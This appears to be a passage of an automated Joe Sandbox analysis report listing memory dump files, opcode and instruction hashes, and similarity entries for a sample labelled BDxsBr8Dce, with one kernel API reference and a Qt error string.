                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: QLayout::activate: %s "%s" does not have a main widget
                                                                                                            • API String ID: 0-247494232
                                                                                                            • Opcode ID: 56cee84acef67d6a77d62fd8c8105ec751b6b7475d6b28015647a24b328017a8
                                                                                                            • Instruction ID: b8f2c059a288d07efb96ef44a99b83d1ae2449ac0d51c46532e92aba003d8d46
                                                                                                            • Opcode Fuzzy Hash: 56cee84acef67d6a77d62fd8c8105ec751b6b7475d6b28015647a24b328017a8
                                                                                                            • Instruction Fuzzy Hash: 01818E757043089FCB18DF68C995AABBBEABF88304F44086DF48587291EF25DD88D781
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(01105FF3,0158FED8,00000014), ref: 01114949
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: c9324e8e8629644a66603c5f80463ac8de90d08291d47cfb29f1dd204e9d4d10
                                                                                                            • Instruction ID: d676f3ce130d2d81e9b6ae12f8db6396fb9769f4afbf49449400bd0a433319a6
                                                                                                            • Opcode Fuzzy Hash: c9324e8e8629644a66603c5f80463ac8de90d08291d47cfb29f1dd204e9d4d10
                                                                                                            • Instruction Fuzzy Hash: 1DB012B030310287572C0B38741900937D4A70820E342007EB01BC5558FF20D450AB00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3404b5e21ceac13325209edf396b263f1385709c1f518f06f9d97860e6471b40
                                                                                                            • Instruction ID: 4f067e5dbf5b77d5440c7e709bd6d9a16a0c9168b937c4e1870001504e13d2b4
                                                                                                            • Opcode Fuzzy Hash: 3404b5e21ceac13325209edf396b263f1385709c1f518f06f9d97860e6471b40
                                                                                                            • Instruction Fuzzy Hash: 08813235914F958AC323DF3AD461167F7B8BF6B280B119B0EE48B7A911EB31E1D28750
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c9256cda110938c1aa983d4caf3b5368786dc5ee3604320069736e1c38f97461
                                                                                                            • Instruction ID: aa6dd280a2dfe68b8b7cccf2000437dfcca5ef41f82347c2ca592b586b7853c3
                                                                                                            • Opcode Fuzzy Hash: c9256cda110938c1aa983d4caf3b5368786dc5ee3604320069736e1c38f97461
                                                                                                            • Instruction Fuzzy Hash: 523174BBE26C2506E348CC3A8C613EA114397D5330BAEC7786E76EE2D5ECED98550190
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6cba3e4b3db02f3f54ac15f87d72769597a1c3c937a1c17e29cc2a45f309a67b
                                                                                                            • Instruction ID: 5afc65a31245fc9f9208f7c3297cb1f42a0ca4fa16752b80c1e794a890a86f0e
                                                                                                            • Opcode Fuzzy Hash: 6cba3e4b3db02f3f54ac15f87d72769597a1c3c937a1c17e29cc2a45f309a67b
                                                                                                            • Instruction Fuzzy Hash: D1116D6E321D010BA75CC71AA83323A2193F3C831A688E57DE55BCA3CDEE39442A8345
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d72ccf8dac77f1b00003ee8195420d1bc1202c376e83ef9db3bbb7c1674fa9c1
                                                                                                            • Instruction ID: 461c9f97d556d0e78174b6e34400e984abf4fb66ae74a0cd7792254af637b3a1
                                                                                                            • Opcode Fuzzy Hash: d72ccf8dac77f1b00003ee8195420d1bc1202c376e83ef9db3bbb7c1674fa9c1
                                                                                                            • Instruction Fuzzy Hash: 9621B275611A12AFC398CF2AC691A96F7F1BF48300B84A82ED54AC7E00D7B5F421CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99e83496cc0bbcf06e969beb1042779ecef00516fb421de95c9b01886ad4acb6
                                                                                                            • Instruction ID: cc2d3e93efff799c643ca1268a5fdbcbc2728b340b8903ea9bfc5094a383b7bf
                                                                                                            • Opcode Fuzzy Hash: 99e83496cc0bbcf06e969beb1042779ecef00516fb421de95c9b01886ad4acb6
                                                                                                            • Instruction Fuzzy Hash: 031105383000109FCA24DF1DC89CD6AFBEAEFE96513194099A5899B361CB31ED01CAA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e84acfd47a8ef946729741006cc0504e3a2041776b004c66d5af07148103f3da
                                                                                                            • Instruction ID: f761171d77c568a0299e6e9d75512375c62dba01de3b2d365db9508463786b75
                                                                                                            • Opcode Fuzzy Hash: e84acfd47a8ef946729741006cc0504e3a2041776b004c66d5af07148103f3da
                                                                                                            • Instruction Fuzzy Hash: A011C9353001109FCB25DF1DC89CD6AFBEAEFD9B517194099A5899B362CB21EE01DAA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f371be983d8fa99533e9faef8b1b56ac4a3f174c7f265344376e101eaa4d056
                                                                                                            • Instruction ID: b29e82a3fa4145ee0436dc084e9655b319ac2f2d0577740b1538c0d713cdfbf8
                                                                                                            • Opcode Fuzzy Hash: 6f371be983d8fa99533e9faef8b1b56ac4a3f174c7f265344376e101eaa4d056
                                                                                                            • Instruction Fuzzy Hash: E0F09FB42052049FE7848F25C5A8706BAE0BB5831CF74999DD4488E292D3BBC95BCF85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a32c404302bf18af0909a98743b8a87fbd18eb2dc036bd1a01659b4ef999fcaf
                                                                                                            • Instruction ID: 90a2e4ba7cd2fd9889b45e5fbc42d89a1be02432596d29079bca1a865c818c06
                                                                                                            • Opcode Fuzzy Hash: a32c404302bf18af0909a98743b8a87fbd18eb2dc036bd1a01659b4ef999fcaf
                                                                                                            • Instruction Fuzzy Hash: E0E0CFB4505200AFE748CF18D568706BBE0AB59319F24899DE4888F282D3BBD95B8F95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 58488c6da8d87a27acd340c7b360d7e781a6d80a8d73d43dfbf99a43c62c2c98
                                                                                                            • Instruction ID: bde945959e4dad43c0e4c52d9792bacd51b64fe77a657b1c7b58d831e4ebe5e3
                                                                                                            • Opcode Fuzzy Hash: 58488c6da8d87a27acd340c7b360d7e781a6d80a8d73d43dfbf99a43c62c2c98
                                                                                                            • Instruction Fuzzy Hash: 00E0FEB41052009BE788CF19C558702BAE0AB58308F34889DE0888E282D3BBC94BCF81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
